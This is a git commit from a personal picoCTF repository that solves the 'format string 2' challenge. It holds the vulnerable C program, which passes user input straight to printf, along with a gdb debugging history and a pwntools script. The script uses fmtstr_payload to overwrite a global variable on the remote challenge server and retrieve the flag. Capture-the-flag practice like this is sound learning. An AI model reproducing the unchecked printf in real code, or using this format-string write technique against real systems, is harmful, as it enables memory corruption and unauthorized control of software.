theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

format string 2

Browse Source
This commit is contained in:
Maxime Vorwerk
2024-11-02 02:00:29 +01:00
parent 198d87467e
commit b4bd094d7e
5 changed files with 278 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

217
format_string_2/.gdb_history Normal file
View File

@@ -0,0 +1,217 @@
disassemble main
b *main+75
run
exit
disams main
disasm
disams main
disasm main
disassemble main
b *main+75
run
n
n
n
n
stack
stack 10
stack 20
stack 40
search 0x21737573
search \x21\x73\x75\x73
search -dword 0x21737573
search --dword 0x21737573
search --dword 0x00404060
search --qword 0x0000000000404060
disassemble main
stack 40
stack 60
search --dword 0x21737573
run
continue
run
stack 40
stack 60
continue
run
search --dword 0x21737573
continue
run
continue
run
disassemble main
exit
disassemble main
exit
disassemble main
b *main+95
run
stack 60
help x
stack 60
x 1xg 0x7fffffffbc70
x 1x 0x7fffffffbc70
x 0x7fffffffbc70
x 0x7fffffffbc70
2x 0x7fffffffbc70
x2 0x7fffffffbc70
x 2 0x7fffffffbc70
x /2 0x7fffffffbc70
x /1xg 0x7fffffffbc70
n
x /1xg 0x7fffffffbc70A
continue
continue
run
exit
b *main+95
run
x /1xg 0x7fffffffbc70A
stack
stack 60
x /1xg 0x7fffffffbc70
continue
run
stack
stack 60
x /1xg 0x7fffffffbc70
continue
run
stack 60
continue
exit
python import sys
python print(sys.path)
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
disassemble main
b *main+95
run
stack 40
continue
disassemble main
run
stack 40
continue
search b570
find b570
run
stack 40
continue
info
exit
disassemble main
b *main+95
run
stack 40
continue
run
stack 40
continue
run
n
stack 40
exit
disassemble main
b *main+95
run
n
x/1x
x/2xw 0x7fffffffb570
x/xw 0x7fffffffb570
x 0x7fffffffb570
continue
run
x 0x7fffffffb570
n
x 0x7fffffffb570
continue
run
stack 60
continue
run
stack 60
n
continue
run
stack 20
continue
run
stack
stack20
stack 20
continue
run
stack 20
continue
run
exit
b *main+95
run < python print(b"\x60\x40\x40\x00")
run < python -c "print(b"\x60\x40\x40\x00")"
run < python3 -c "print(b"\x60\x40\x40\x00")"
exit
b *main+95
run < pipe
exit
b *main+95
run < pipe
continue
exit
b *main+95
run < pipe
stack 20
x 0x404060
n
x 0x404060
exit
b *main+95
run
stack 20
n
exit
exit
b *main+95
run
run < pipe
x 0x404060
n
x 0x404060
stack 20
continue
exit
b *main+95
run
run < pipe
disassemble main
x 0x404060
x 0x7fffffffba00
x $rip
x $rip+0x2de7
x 0x401273+0x2de7
x 0x401279+0x2de7
stack 40
continue
run
stack 40
n
run < pipe
stack 20
continue
run < pipe
stack 20
continue
run < pipe
stack 20
continue
run < pipe
stack 20
exit

2
format_string_2/peda-session-vuln.txt Normal file
View File

@@ -0,0 +1,2 @@
break *main+95

24
format_string_2/sol.py Executable file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
address = "rhea.picoctf.net"
port = 51393
conn = remote(address, port)
def send_payload(payload):
conn = remote(address, port)
log.info(f"payload: {repr(payload)}")
conn.sendline(payload)
return conn.recvall()
format_string = FmtStr(send_payload)
offset = format_string.offset
payload = fmtstr_payload(offset, {0x404060: 0x67616c66})
log.info(payload)
conn.sendline(payload)
flag = conn.recvall()
log.success(flag)

BIN
format_string_2/vuln Executable file
View File

Binary file not shown.

35
format_string_2/vuln.c Normal file
View File

@@ -0,0 +1,35 @@
#include <stdio.h>
int sus = 0x21737573;
int main() {
char buf[1024];
char flag[64];
printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your input: ");
printf(buf);
printf("\n");
fflush(stdout);
if (sus == 0x67616c66) {
printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
// Read in the flag
FILE *fd = fopen("flag.txt", "r");
fgets(flag, 64, fd);
printf("%s", flag);
fflush(stdout);
}
else {
printf("sus = 0x%x\n", sus);
printf("You can do better!\n");
fflush(stdout);
}
return 0;
}